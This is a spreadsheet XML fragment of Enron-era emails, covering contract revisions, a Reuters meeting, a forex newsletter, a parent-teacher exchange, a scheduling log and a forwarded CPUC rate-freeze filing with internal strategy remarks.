    <t>Wed, 25 Apr 2001 17:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brad.morse@enron.com', 'david.fairley@enron.com', 'ozzie.pagan@enron.com', 'tom.may@enron.com', 'edith.cross@enron.com', 'reagan.rorschach@enron.com', 'heather.kroll@enron.com', 'lloyd.will@enron.com', 'wmontjoy@brunini.com', 'elizabeth.sager@enron.com', 'kayne.coulter@enron.com', 'corry.bentley@enron.com', 'jeffrey.hodge@enron.com', 'edward.sacks@enron.com'})</t>
  </si>
  <si>
    <t>MDEA agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the latest revision, incorporating comments from the Enron team.  _x000D_
There were some comments which were either discussion points or not readily _x000D_
decipherable, so those will need to be addressed in the next version.  _x000D_
There's still some harmonization/nit stuff which we will pick up then also.  _x000D_
Hopefully, David Hunt (MDEA's lawyer) and I will hammer out the more _x000D_
legalistic (yet important) stuff while he is in our office tomorrow._x000D_
_x000D_
Ed, maybe we can schedule a call with our local counsel to get some  more _x000D_
comfort on the authority issue.   In addition, we can ask for an _x000D_
authority/enforceability opinion from MDEA's counsel.  We'll beef up the reps _x000D_
as well._x000D_
_x000D_
Reagan/David, Ed's availability is best first thing tomorrow (Thurs) morning. _x000D_
_x000D_
See you soon,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 14:41:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'s..palmer@enron.com'})</t>
  </si>
  <si>
    <t>RE: Confirmation for meeting on Friday at 1.00pm</t>
  </si>
  <si>
    <t xml:space="preserve">OK. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Zipper, Andy  _x000D_
Sent:	Tuesday, May 22, 2001 2:17 PM_x000D_
To:	Palmer, Mark S._x000D_
Cc:	Piper, Greg; Shelby, Rex; Bibi, Philippe A._x000D_
Subject:	FW: Confirmation for meeting on Friday at 1.00pm_x000D_
_x000D_
Mark can you set up a full blown demo for this guy. I have a commitment from Simon that Reuters will try to keep it to two groups looking at demo's here._x000D_
Let me know if thee is a problem._x000D_
_x000D_
Thanks_x000D_
Andy_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Simon Cheshire &lt;simon.cheshire@reuters.com&gt;@ENRON [mailto:IMCEANOTES-Simon+20Cheshire+20+3Csimon+2Echeshire+40reuters+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, May 22, 2001 2:14 PM_x000D_
To:	Zipper, Andy_x000D_
Cc:	Jim Perrello_x000D_
Subject:	Confirmation for meeting on Friday at 1.00pm_x000D_
_x000D_
_x000D_
_x000D_
Hi Andy,_x000D_
_x000D_
I just wanted to do a note to confirm that Jim Perrello will be visiting you at_x000D_
1.00pm this Friday.  I have attached a recent press release we issued announcing_x000D_
Jim's appointment as CEO of Reuters Liquid Markets.  As discussed, the goal of_x000D_
Friday's meeting is for Jim to provide feedback on the applicability of the_x000D_
EnronOnline technology to the financial markets and particularly if, with little_x000D_
customization, it could be used in the commercial paper marketplace._x000D_
_x000D_
I have copied Jim and would appreciate if you could email the details of where_x000D_
he should go on Friday._x000D_
_x000D_
Cheers,_x000D_
Simon_x000D_
_x000D_
(See attached file: LM press release.htm)_x000D_
_x000D_
_x000D_
-----------------------------------------------------------------_x000D_
        Visit our Internet site at http://www.reuters.com_x000D_
_x000D_
Any views expressed in this message are those of  the  individual_x000D_
sender,  except  where  the sender specifically states them to be_x000D_
the views of Reuters Ltd._x000D_
_x000D_
 - LM press release.htm &lt;&lt; File: LM press release.htm &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 00:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Time</t>
  </si>
  <si>
    <t>Please set up a phone call.  thanks.  Jeff_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 11/14/2000 _x000D_
08:32 AM ---------------------------_x000D_
_x000D_
_x000D_
Jeff Kabel@ENRON_x000D_
11/14/2000 07:15 AM_x000D_
Sent by: Jeff Kabel@ENRON_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Time_x000D_
_x000D_
Have not heard anything from your secretary?_x000D_
_x000D_
jf</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 04:32:23 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
[IMAGE] Forums Discuss these points in the Forums:  Forexnews Forum       T=_x000D_
echnicals Live Charts Analysis available from: Cornelius Luca   J.P. Chorek=_x000D_
   Technical Research Ltd.   Charts &amp; News featuring Standard &amp; Poor's     =_x000D_
  Interest Rates   US: Japan: Eurozone: UK: Switzerland:   2.5%  0.15%  3.7=_x000D_
5%  4.5%  1.75-2.75%       [IMAGE] =09 [IMAGE]  USD Hits New Multi-Week Hig=_x000D_
hs As Recovery Story Continues  October 23, 7:00 AM: EUR/$..0.8884 $/JPY..1=_x000D_
22.67 GBP/$..1.4207 $/CHF..1.6658  USD Hits New Multi-Week Highs As Recover=_x000D_
y Story Continues by Jes Black  At 9:00:00 AM US BTM/UBSW sales (exo n/a, p=_x000D_
rev -1.3%) US Redbook (exp 0.7%, prev 0.6%) Event: Chairman Greenspan to sp=_x000D_
eak at 8:00 AM to a meeting of the American Bankers' Association in Washing=_x000D_
ton  The dollar added to Monday's gains, reaching fresh multi-week highs ac=_x000D_
ross the board on continued optimism for the US economic future. There is c=_x000D_
onfidence the US economy can recover from this terrible third quarter and t=_x000D_
his is being reflected in US equity market strength and subsequently the do=_x000D_
llar. USD hit six-week highs of 88.72 vs. EUR and 1.6674 against CHF in Eur=_x000D_
opean trade after a sleepy Asian session. The dollar also hit fresh nine-we=_x000D_
ek highs of 1.4201 against sterling and 122.84 yen.  Dealers drove the doll=_x000D_
ar higher for both domestic and external reasons. Fueling gains at home is =_x000D_
the fact that of 225 companies in the S?500 reporting Q3 earnings so far, 8=_x000D_
5% matched or exceeded projected targets. Therefore, investors are looking =_x000D_
ahead to an economic recovery next year and pushing up stocks now. Fears ab=_x000D_
out the war on terrorism and concerns about the current economic environmen=_x000D_
t have been discounted. Case in point: yesterday's surprise announcement of=_x000D_
 two deceased postal workers who were exposed to anthrax failed to substant=_x000D_
ially move the dollar lower. For that reason, the risk-aversion problem is =_x000D_
fading for the dollar, and USD has now moved beyond September 11 attack lev=_x000D_
els. In fact, after dealers put fears of war aside they began to reassess r=_x000D_
elative growth rates amongst the majors and found the US economy to have be=_x000D_
tter long-term prospects.  USD/JPY advanced above its offshore high of 122.=_x000D_
60 to a fresh 9-week high of 122.84. Support is seen at 122.60 and the doll=_x000D_
ar's upswing may intensify should it break 122.80, where stop-loss orders a=_x000D_
re rumored to be placed. Major technical resistance is seen around 123.25. =_x000D_
Weighing on the yen was today's economic data from Japan which showed consu=_x000D_
mer confidence fell in September fell to 36.9, down four points from June a=_x000D_
nd the weakest reading since 35.2 in September 1998.   Sterling also dipped=_x000D_
 below yesterday's nine-week low of 1.4215, to a new low of 1.4208. Dealers=_x000D_
 say comments made by Bank of England member Allsopp that he was concerned =_x000D_
by the  four-year long overvaluation of sterling  pressured the pound. Alls=_x000D_
opp, who is an external member, said a fall in sterling's value of as much =_x000D_
as 10% would be welcome. He also felt UK interest rates should be cut furth=_x000D_
er to tackle a combination of a weakening global economy and a slowdown in =_x000D_
UK consumer demand. Minutes of the MPC's September and October meetings, re=_x000D_
leased last week, showed that when the committee voted 7-2 on September 18 =_x000D_
for a 25 basis point rate cut, Allsopp was one of two members to vote for a=_x000D_
 half point cut.   Sterling is now hovering below the 50% Fibonacci retrace=_x000D_
ment of this year's uptrend from around 1.37 to 1.48. If sterling's 6-cent =_x000D_
slide in two weeks does not stabilize as investors take profit from the rec=_x000D_
ent sell-off, cable will target 1.4120, the 61.8% Fibonacci retracement of =_x000D_
this year's same uptrend from June. Boding well for the pound is the fact t=_x000D_
hat the Bank of England appears ready to ease monetary policy again in orde=_x000D_
r to bolster economic growth. The decline in September inflation below the =_x000D_
2.5% target will provide the central bank with leeway to cut interest rates=_x000D_
 again by another 25-bp this year and the BoE's willingness to spur growth =_x000D_
(unlike the ECB) will benefit the pound.   EUR/USD came under further press=_x000D_
ure on Monday following bearish economic forecasts from Germany's six leadi=_x000D_
ng economic institution as well as uninspiring comments from ECB members ab=_x000D_
out the plunge in growth. This stands in sharp contrast with market percept=_x000D_
ion that aggressive fiscal and monetary policy will pay off for investors w=_x000D_
ho bet on the US recovery. Some investors chose not to wait until Thursday'=_x000D_
s ECB meeting because aside from reassurances that inflation would fall bel=_x000D_
ow the targeted 2.0% level by next year, the ECB appears reluctant to give =_x000D_
another 25 basis point cut this week. This will likely keep pressure on the=_x000D_
 euro. However, even if the ECB were to lower rates, the market reaction co=_x000D_
uld be muted because it has already been priced in for some time now. There=_x000D_
fore, the euro again finds itself in a lose/lose situation because the ECB =_x000D_
has failed to promote growth. A break of 88.70 sees EUR/USD targeting 88.25=_x000D_
/50 area followed by 87.25, the 61.8% Fibonacci retracement of this year's =_x000D_
uptrend from 83.45 to 93.35.  USD/CHF passed yesterday's 6-week high of 1.6=_x000D_
640, to reach a fresh high of 1.6680. Gains against the Swiss franc highlig=_x000D_
hted the fact that the risk premium that investors paid to be in the franc =_x000D_
has faded. USD/CHF is now above September 11 attack levels and even though =_x000D_
the dollar has corrected against the European currencies it still has more =_x000D_
room to rise, especially against the Swiss franc, dealers say. Target is th=_x000D_
e 1.6735 area. However, any major negative developments for the US, at home=_x000D_
 or abroad, would quickly translate into gains for the franc  Meanwhile, am=_x000D_
id a lack of key data, dealers will await any possible direction Greenspan =_x000D_
might give them this week from three scheduled appearances. Greenspan is sc=_x000D_
heduled to speak today at 8:00 AM at a meeting of the American Bankers' Ass=_x000D_
ociation in Washington and has other appearances as well on Wednesday and F=_x000D_
riday via satellite.   Dealers will also look to see if Wall Street enjoys =_x000D_
Tuesday as well as it did yesterday in the face of earnings reports for Q3.=_x000D_
 So far, of 225 companies in the S?500 reporting Q3 earnings, 85% matched o=_x000D_
r exceeded projected targets. This has fueled gains in the Dow and Nasdaq a=_x000D_
nd today's futures are up 33 and 9 points respectively. Xerox, Daimler Chry=_x000D_
sler, and Exxon are reporting before the market open and only one major com=_x000D_
pany, ATT&amp;T, is reporting after the bell.  =09[IMAGE] Audio Mkt. Analysis U=_x000D_
SD Extends Broad Rally to Pre Sep 11 Highs       Articles &amp; Ideas  EURO: Ge=_x000D_
rman IFO Will Remind ECB to Build Growth    Dollar Comeback Stopped by Risk=_x000D_
 of Terrorism       Articles &amp; Ideas Forex Glossary   Economic Indicators  =_x000D_
 Forex Guides   Link Library      [IMAGE] =09_x000D_
=09=09[IMAGE][IMAGE] [IMAGE][IMAGE]=09_x000D_
=09=09  This e-mail is never sent unsolicited. If you wish to unsubscribe f=_x000D_
rom this or any other Forexnews.com newsletters, please click here .  =09_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 02:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Michael's Performance Form</t>
  </si>
  <si>
    <t xml:space="preserve">Neil,  I thought you were going to tell her to just answer that he gets _x000D_
nothing at school.  She has no independent information on the rest and _x000D_
shouldn't worry about providing that info to them._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 06/06/2001 08:21:02 AM_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
To: "'Kara Norris'" &lt;kara_norris@hotmail.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Michael's Performance Form_x000D_
_x000D_
I was out of the office yesterday and apologize for the delay in responding._x000D_
I'm not sure about class/type. Michael does see Sharon Seals and Associates_x000D_
Speech-Language Pathologists once a week for 1 hour. The only testing has_x000D_
been from Danny Williamson, Developmental Pediatrician who is an associate_x000D_
of Nancy LaFever. This was an eval for ADHD. He was also tested by SBISD for_x000D_
the same issue. Williamson and LaFever have all this information in his_x000D_
file._x000D_
Thanks for you help with this. Neil_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kara Norris [mailto:kara_norris@hotmail.com]_x000D_
Sent: Monday, June 04, 2001 7:03 PM_x000D_
To: nmann@erac.com_x000D_
Subject: Michael's Performance Form_x000D_
_x000D_
_x000D_
Hi Neil!  Michael looked so happy to see you for chapel today.  Thanks for_x000D_
being there._x000D_
_x000D_
I have a few questions in order to complete this form.  It asks a couple of_x000D_
questions about the help he is receiving outside of school.  If you could_x000D_
answer them for me, I can have this turned in tomorrow._x000D_
_x000D_
Classification?_x000D_
Type?_x000D_
Hours per Week?_x000D_
Has Michael received any testing from the outside help (speech/language_x000D_
specialist)?_x000D_
_x000D_
Today Michael told me that I would "have to come over soon, because (he)_x000D_
would be going far away from St. Francis for summer camp".  If he is adamant_x000D_
about us getting together outside of school, I would be happy to meet you_x000D_
and Michael or Michael and Kay (or his sister) for a lunch date_x000D_
somewhere/sometime this summer.  Let me know._x000D_
_x000D_
Once again, I have really enjoyed getting to know your family.  See you at_x000D_
the party Wednesday at 2:15._x000D_
Kara_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 18:38:05 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/10/02; HourAhead hour: 17;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/10/02; HourAhead hour: 17;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011017.txt</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 02:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kdavis02@coair.com'})</t>
  </si>
  <si>
    <t>FW: Overworked</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Dana Davis/HOU/ECT on 10/31/2000 10:32 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Rufino Doroteo_x000D_
10/27/2000 10:00 AM_x000D_
To: Dana Davis/HOU/ECT@ECT, Rebecca Sanchez/HOU/ECT@ECT, Simone La _x000D_
Rose/HOU/ECT@ECT, Marilyn Rivera/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: Overworked_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rufino Doroteo/HOU/ECT on 10/27/2000 _x000D_
09:58 AM ---------------------------_x000D_
_x000D_
_x000D_
"Loera M (Maribel)" &lt;MLoera@equiva.com&gt; on 10/27/2000 09:54:20 AM_x000D_
To: "'Rufino Doroteo'" &lt;rdoroteo@ect.enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Overworked_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Rowland J (Janina)_x000D_
&gt; Sent: Friday, October 27, 2000 9:46 AM_x000D_
&gt; To: Marshall SS (Samantha); McLain CD (Carol); Waddilove P (Pamm); Loera_x000D_
&gt; M (Maribel); Buentello SA (Sky); Torres J (Juanita);_x000D_
&gt; 'pbrauer@kandplaw.com'_x000D_
&gt; Subject: FW: Overworked_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Jones Jan (JW)_x000D_
&gt; Sent: Friday, October 27, 2000 9:45 AM_x000D_
&gt; Subject: FW: Overworked_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Catherine Wilkers [SMTP:cwilkers@e-docs.net]_x000D_
&gt; Sent: Friday, October 27, 2000 9:38 AM_x000D_
&gt; To: Jack Wilkers; Newton, Vicki E (Vicki); Stacy Mohler; Sue Anne_x000D_
&gt; MacGinnis; Jones Jan (JW); Harnage, Kimberly (MED, GE-Marquette)_x000D_
&gt; Subject: FW: Overworked_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  &lt;&lt;overworked.gif&gt;&gt;_x000D_
_x000D_
 - overworked.gif_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'mona.petrochko@enron.com', 'james.steffes@enron.com', 'jeff.dasovich@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: A. 99-01-034 SCE's Ex Parte Request for the_x000D_
 ImmediateSuspension, etc, 10-5-00</t>
  </si>
  <si>
    <t xml:space="preserve">It looks like SCE's request is similar to PG&amp;E's request.  If recovery of=_x000D_
=20_x000D_
undercollected procurement costs through a post-freeze surcharge means that=_x000D_
=20_x000D_
the rate freeze is guaranteed to December 31, 2001 or March 31, 2002, SCE's=_x000D_
=20_x000D_
proposal is not necessarily bad.  If we can get the CPUC to throw SCE and=_x000D_
=20_x000D_
PG&amp;E a bone, while keeping the percentage of ultimate recovery uncertain,=_x000D_
=20_x000D_
this may solve a lot of concerns.  We would also like to see any recovery=_x000D_
=20_x000D_
managed over multiple years in order to keep the surcharge to a minimum.  T=_x000D_
he=20_x000D_
surcharge will have a negative impact on our current book; however, this=20_x000D_
impact may net out against any positive impacts for such a plan for both PG=_x000D_
&amp;E=20_x000D_
and SCE.  Additionally, deferring and/or extending the recovery period for=_x000D_
=20_x000D_
the surcharge will mitigate negative impacts to our book.  Even though a=20_x000D_
surcharge will cause higher delivery curves which may result in less=20_x000D_
attractive bundled energy deals (depending on the customer's benchmark), we=_x000D_
=20_x000D_
will still be able to sell unbundled commodity only deals which will largel=_x000D_
y=20_x000D_
depend on the post-freeze deregulated market structure.  We have implemente=_x000D_
d=20_x000D_
the strategy to sell unbundled commodity only, when the regulatory risks=20_x000D_
become too volatile and when the market structure supports demand for such =_x000D_
a=20_x000D_
product (e.g. SDG&amp;E's service territory)._x000D_
_x000D_
I don't necessarily think it is prudent to publicly oppose the utilities on=_x000D_
=20_x000D_
this issue.  I am not even sure we should tip our hand by saying anything=_x000D_
=20_x000D_
publicly on this issue.  We might want to maintain a poker face in public. =_x000D_
=20_x000D_
If we come out to strongly, then we might foreclose an opportunity to work=_x000D_
=20_x000D_
with the utilities.  If we come out in support, people might figure us out.=_x000D_
 =20_x000D_
Whatever the outcome, it is important to preserve the rate freeze as it=20_x000D_
exists today, which means a PX credit for DA customers._x000D_
_x000D_
Roger_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Roger Yang/SFO/EES on 10/09/2000 10:32 =_x000D_
AM=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Mona L Petrochko_x000D_
10/06/2000 09:28 AM_x000D_
To: West GA, Harry Kingerski@EES, James D Steffes/NA/Enron@Enron, Laird=20_x000D_
Dyer/SF/ECT@ECT, Michael McDonald@ECT, David Parquet@ECT, Roger Yang, Denni=_x000D_
s=20_x000D_
Benevides/HOU/EES@EES, Mary Hain@Enron_x000D_
cc: =20_x000D_
Subject: Fwd: A. 99-01-034 SCE's Ex Parte Request for the=20_x000D_
ImmediateSuspension, etc, 10-5-00_x000D_
_x000D_
FYI._x000D_
---------------------- Forwarded by Mona L Petrochko/SFO/EES on 10/06/2000=_x000D_
=20_x000D_
07:26 AM ---------------------------_x000D_
_x000D_
_x000D_
"Daniel Douglass" &lt;douglass@ArterHadden.com&gt; on 10/05/2000 06:39:04 PM_x000D_
To: &lt;JBarthrop@electric.com&gt;, &lt;mnelson@electric.com&gt;,=20_x000D_
&lt;RSchlanert@electric.com&gt;, &lt;mpetroch@enron.com&gt;, &lt;susan_j_mara@enron.com&gt;,=_x000D_
=20_x000D_
&lt;counihan@greenmountain.com&gt;, &lt;athomas@newenergy.com&gt;, &lt;bchen@newenergy.com=_x000D_
&gt;,=20_x000D_
&lt;kmagruder@newpower.com&gt;, &lt;Jeff.Hanson@phaser.com&gt;, &lt;anchau@shellus.com&gt;,=_x000D_
=20_x000D_
&lt;andrew.madden@utility.com&gt;, &lt;ben.reyes@utility.com&gt;,=20_x000D_
&lt;chris.king@utility.com&gt;, &lt;david.bayless@utility.com&gt;_x000D_
cc: =20_x000D_
Subject: Fwd: A. 99-01-034 SCE's Ex Parte Request for the=20_x000D_
ImmediateSuspension, etc, 10-5-00_x000D_
_x000D_
_x000D_
_x000D_
Today, Edison filed?an ex parte request that the Commission declare  that a=_x000D_
n=20_x000D_
unforeseen emergency_x000D_
situation has arisen which merits the immediate  suspension as to SCE of th=_x000D_
e=20_x000D_
ffective date of those portions of Decisions  99-10-057 and 00-03-058 (the=_x000D_
=20_x000D_
End of Rate Freeze Decisions) which do not permit  the recovery of a TRA=20_x000D_
balance after the end of SCE=01,s rate freeze.? The  following is a direct =_x000D_
quote=20_x000D_
from the filing:_x000D_
?_x000D_
"Specifically, SCE asks for suspension of the effective date of application=_x000D_
 =20_x000D_
to_x000D_
SCE of Conclusions of Law 3 and 4 in D. 99-10-057, which read:_x000D_
3. Carrying over balances related to the =01&amp;PX lag=018 or_x000D_
other unrecovered  costs in the TRA or the TCBA violates_x000D_
the rate freeze provisions of AB 1890.  Delaying the end of_x000D_
the rate freeze in order to resolve pending  Commission_x000D_
proceedings addressing costs incurred during the rate_x000D_
freeze  contravenes AB 1890._x000D_
4. Sections 368(a) and 367(a) do not permit the_x000D_
utilities to carry over  after the rate freeze those costs_x000D_
incurred during the rate greeze. Exceptions  to the rate_x000D_
freeze that are not specifically ennumerated in AB 1890_x000D_
are  not lawful._x000D_
SCE also asks for suspension, as to SCE, of effective date of the second =_x000D_
=20_x000D_
bullet-pointed_x000D_
subparagraph of Ordering Paragraph 2 in D. 99-10-057, which  reads:_x000D_
2. The tariffs proposed by the advice letters shall not_x000D_
be modified  except as required by this order, as follows:_x000D_
* * * *_x000D_
No utility may carry  over costs incurred during the rate_x000D_
freeze period to the post =01)rate freeze  period,_x000D_
notwithstanding the status of the Transition Revenue_x000D_
Account  (TRA), relevant Commission proceedings, or_x000D_
Power Exchange (PX) billings, as  set forth herein._x000D_
SCE also asks for suspension, as to SCE, of the effective date of  any_x000D_
provisions of D. 00-03-058 which are consistent with the above  Conclusions=_x000D_
=20_x000D_
of Law_x000D_
and Ordering Subpararagraph._x000D_
This request is based upon and hereby incorporates the Emergency  Petition_x000D_
Of Southern California Edison Company (U 338-E) For Expedited  Modification=_x000D_
 Of_x000D_
Decisions 99-10-057 And 00-03-058 and the supporting  declarations of Chris_x000D_
Dominski and W. James Scilacci (collectively, the  =01&amp;Emergency Petition=_x000D_
=018)=20_x000D_
filed on_x000D_
October 4, 2000."_x000D_
?_x000D_
Attached is a copy of the filing._x000D_
?_x000D_
Dan_x000D_
Date: Thu, 05 Oct 2000 19:15:13 -0400_x000D_
From: "Archer, Anthony V" &lt;ARCHERAV@sce.com&gt;_x000D_
To: "'kpoole@adamsbroadwell.com'" &lt;kpoole@adamsbroadwell.com&gt;,=20_x000D_
"'mdjoseph@adamsbroadwell.com'" &lt;mdjoseph@adamsbroadwell.com&gt;,=20_x000D_
"'epoole@adplaw.com'" &lt;epoole@adplaw.com&gt;, "'mpa@aelaw.com'" &lt;mpa@aelaw.com=_x000D_
&gt;,=20_x000D_
"'jweil@aglet.org'" &lt;jweil@aglet.org&gt;, "'ronknecht@aol.com'"=20_x000D_
&lt;ronknecht@aol.com&gt;, "'berry@apx.com'" &lt;berry@apx.com&gt;,"'ed@apx.com'"=20_x000D_
&lt;ed@apx.com&gt;, "Daniel Douglass" &lt;Douglass@ArterHadden.com&gt;, "Freya Christia=_x000D_
n"=20_x000D_
&lt;FChristi@ArterHadden.com&gt;, "'mgomez1@bart.gov'" &lt;mgomez1@bart.gov&gt;,=20_x000D_
"'rschmidt@bartlewells.com'" &lt;rschmidt@bartlewells.com&gt;,=20_x000D_
"'wbooth@booth-law.com'" &lt;wbooth@booth-law.com&gt;, "'blaising@braunlegal.com'=_x000D_
"=20_x000D_
&lt;blaising@braunlegal.com&gt;, "'rmccann@cal.net'" &lt;rmccann@cal.net&gt;,=20_x000D_
"'glwaas@calpx.com'" &lt;glwaas@calpx.com&gt;, "'lgurick@calpx.com'"=20_x000D_
&lt;lgurick@calpx.com&gt;, "'kmills@cfbf.com'" &lt;kmills@cfbf.com&gt;,=20_x000D_
"'rliebert@cfbf.com'" &lt;rliebert@cfbf.com&gt;, "'theresa_mueller@ci.sf.ca.us'"=_x000D_
=20_x000D_
&lt;theresa_mueller@ci.sf.ca.us&gt;, "'honest@compuserve.com'"=20_x000D_
&lt;honest@compuserve.com&gt;, "'mbrubaker@consultbai.com'"=20_x000D_
&lt;mbrubaker@consultbai.com&gt;, "'ang@cpuc.ca.gov'" &lt;ang@cpuc.ca.gov&gt;,=20_x000D_
"'fua@cpuc.ca.gov'" &lt;fua@cpuc.ca.gov&gt;, "'jjz@cpuc.ca.gov'" &lt;jjz@cpuc.ca.gov=_x000D_
&gt;,=20_x000D_
"'kim@cpuc.ca.gov'" &lt;kim@cpuc.ca.gov&gt;, "'kth@cpuc.ca.gov'" &lt;kth@cpuc.ca.gov=_x000D_
&gt;,=20_x000D_
"'mer@cpuc.ca.gov'" &lt;mer@cpuc.ca.gov&gt;, "'raw@cpuc.ca.gov'" &lt;raw@cpuc.ca.gov=_x000D_
&gt;,=20_x000D_
"'rtf@cpuc.ca.gov'" &lt;rtf@cpuc.ca.gov&gt;, "'ztc@cpuc.ca.gov'" &lt;ztc@cpuc.ca.gov=_x000D_
&gt;,=20_x000D_
"'patrickm@crossborderenergy.com'" &lt;patrickm@crossborderenergy.com&gt;,=20_x000D_
"'pstohr@dbsr.com'" &lt;pstohr@dbsr.com&gt;, "'ad046@detroit.freenet.org'"=20_x000D_
&lt;ad046@detroit.freenet.org&gt;, "'pat.williams@dhcmail.com'"=20_x000D_
&lt;pat.williams@dhcmail.com&gt;, "'natutt@duanemorris.com'"=20_x000D_
&lt;natutt@duanemorris.com&gt;, "'gtbl@dynegy.com'" &lt;gtbl@dynegy.com&gt;,=20_x000D_
"'brbarkovich@earthlink.net'" &lt;brbarkovich@earthlink.net&gt;,=20_x000D_
"'jsilva@edisonenterprises.com'" &lt;jsilva@edisonenterprises.com&gt;,=20_x000D_
"'huse@eesconsulting.com'" &lt;huse@eesconsulting.com&gt;,=20_x000D_
"'sdefrawi@efaches.navfac.navy.mil'" &lt;sdefrawi@efaches.navfac.navy.mil&gt;,=20_x000D_
"'furutanj@efawest.navfac.navy.mil'" &lt;furutanj@efawest.navfac.navy.mil&gt;,=20_x000D_
"'cmkehrein@ems-ca.com'" &lt;cmkehrein@ems-ca.com&gt;,=20_x000D_
"'askaff@energy-law-group.com'" &lt;askaff@energy-law-group.com&gt;,=20_x000D_
"'difellman@energy-law-group.com'" &lt;difellman@energy-law-group.com&gt;,=20_x000D_
"'jtachera@energy.state.ca.us'" &lt;jtachera@energy.state.ca.us&gt;,=20_x000D_
"'LKristov@energy.state.ca.us'" &lt;LKristov@energy.state.ca.us&gt;,=20_x000D_
"'rtavares@energy.state.ca.us'" &lt;rtavares@energy.state.ca.us&gt;,=20_x000D_
"'Slayman@energy.state.ca.us'" &lt;Slayman@energy.state.ca.us&gt;,=20_x000D_
"'abb@eslawfirm.com'" &lt;abb@eslawfirm.com&gt;, "'jdh@eslawfirm.com'"=20_x000D_
&lt;jdh@eslawfirm.com&gt;, "'jbennett@gmssr.com'" &lt;jbennett@gmssr.com&gt;,=20_x000D_
"'jlondon@gralegal.com'" &lt;jlondon@gralegal.com&gt;,=20_x000D_
"'rick.counihan@greenmountain.com'" &lt;rick.counihan@greenmountain.com&gt;,=20_x000D_
"'ddavie@hesinet.com'" &lt;ddavie@hesinet.com&gt;, "'mhg@hetrading.com'"=20_x000D_
&lt;mhg@hetrading.com&gt;, "'smoss@hooked.net'" &lt;smoss@hooked.net&gt;,=20_x000D_
"'jeff@jbsenergy.com'" &lt;jeff@jbsenergy.com&gt;, "'jogg@jhenergy.com'"=20_x000D_
&lt;jogg@jhenergy.com&gt;, "'ewo@jmbm.com'" &lt;ewo@jmbm.com&gt;,=20_x000D_
"'napedersen@jonesday.com'" &lt;napedersen@jonesday.com&gt;, "'dws@keywaycorp.com=_x000D_
'"=20_x000D_
&lt;dws@keywaycorp.com&gt;, "'karen@klindh.com'" &lt;karen@klindh.com&gt;,=20_x000D_
"'bloomje@la.whitecase.com'" &lt;bloomje@la.whitecase.com&gt;,=20_x000D_
"'btenney@landuselaw.com'" &lt;btenney@landuselaw.com&gt;, "'chilen@llgm.com'"=20_x000D_
&lt;chilen@llgm.com&gt;, "'jleslie@luce.com'" &lt;jleslie@luce.com&gt;,=20_x000D_
"'randy_britt@mayco.com'" &lt;randy_britt@mayco.com&gt;, "'chrism@mid.org'"=20_x000D_
&lt;chrism@mid.org&gt;, "'phanschen@mofo.com'" &lt;phanschen@mofo.com&gt;,=20_x000D_
"'rbw@mrwassoc.com'" &lt;rbw@mrwassoc.com&gt;, "'athomas@newenergy.com'"=20_x000D_
&lt;athomas@newenergy.com&gt;, "'derkp@newsdata.com'" &lt;derkp@newsdata.com&gt;,=20_x000D_
"'ell5@pge.com'" &lt;ell5@pge.com&gt;, "'j3m9@pge.com'" &lt;j3m9@pge.com&gt;,=20_x000D_
"'jyf1@pge.com'" &lt;jyf1@pge.com&gt;, "'whe1@pge.com'" &lt;whe1@pge.com&gt;,=20_x000D_
"'jbarthrop@powersavers.com'" &lt;jbarthrop@powersavers.com&gt;,=20_x000D_
"'keith-sappenfield@reliantenergy.com'"=20_x000D_
&lt;keith-sappenfield@reliantenergy.com&gt;, "'pjmuller@ricochet.net'"=20_x000D_
